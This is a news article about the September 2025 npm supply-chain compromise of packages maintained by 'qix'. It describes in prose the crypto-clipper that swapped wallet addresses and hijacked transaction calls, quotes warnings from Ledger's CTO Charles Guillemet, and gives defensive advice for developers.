Ledger CTO Confirms Massive NPM Supply Chain Attack Targeting JavaScript Ecosystem

A critical supply chain attack has shaken the JavaScript world after the NPM account of a highly respected developer, known under the handle qix, was compromised. According to reports confirmed by Charles Guillemet, Chief Technology Officer of Ledger, the attack has already placed the entire JavaScript ecosystem at risk, with billions of downloads potentially exposed to malicious code.

Dozens of foundational open-source packages maintained by qix, including strip-ansi, color-convert, color-name, error-ex, has-ansi, and is-core-module, were found to contain hidden malware. These utilities sit at the bottom of countless dependency chains, meaning that virtually every modern JavaScript project may have indirectly integrated the compromised versions.

Skip the wait. Buy a licensed company.

The attack is sophisticated. Malicious patch versions were released with obfuscated code designed to intercept and manipulate network requests. At its core, the payload functions as a crypto-clipper, replacing legitimate wallet addresses with those controlled by the attacker. This allows them to silently siphon funds from unsuspecting users.

How the Attack Works

Investigations revealed a two-pronged strategy.

1. Passive interception: The malware hijacks browser functions such as fetch and XMLHttpRequest. It scans for cryptocurrency addresses in outgoing or incoming requests and swaps them with attacker-controlled addresses. The replacement is designed to be visually similar to the original, making detection extremely difficult.
2. Active manipulation: When a crypto wallet is detected, the code goes further. It hijacks transaction calls such as eth_sendTransaction, replaces the recipient address with a malicious one, and forwards the altered transaction for signing. Users who do not carefully inspect transaction details risk unknowingly sending funds to the attacker.

The scope is massive. These libraries collectively record hundreds of millions of weekly downloads, making the blast radius one of the largest supply chain threats ever seen in open source.

Warnings from Ledger’s CTO About the Attack

In a public statement on X, Ledger CTO Charles Guillemet warned that users relying on software wallets should immediately halt on-chain transactions until the situation becomes clearer. Hardware wallet users remain safer, but only if they carefully review each transaction before signing.

“If you use a hardware wallet, pay attention to every transaction before signing and you’re safe. If you don’t use one, refrain from making on-chain transactions for now,” Guillemet advised.

🚨 There’s a large-scale supply chain attack in progress: the NPM account of a reputable developer has been compromised. The affected packages have already been downloaded over 1 billion times, meaning the entire JavaScript ecosystem may be at risk.

The malicious payload works…

Buy bitcoin and stocks. Signup to Coinbase today

— Charles Guillemet (@P3b7_) September 8, 2025

He also confirmed that it is still unclear whether the attacker is attempting to steal seed phrases directly from software wallets.

Protecting Yourself

Developers are urged to act immediately:

• Pin safe versions of affected packages using the overrides feature in package.json.
• Use npm ci in build pipelines to ensure only versions locked in package-lock.json are installed.
• Audit dependencies regularly with tools like Snyk or Dependabot.
• Treat every update to package-lock.json with the same scrutiny as application code.

It is not yet confirmed what chains are affected. This leaves room for speculation that all chains are affected, or at least most of them.

Stay alert. Audit your dependencies. Double-check your transactions. Official announcement from Ledger can be found here.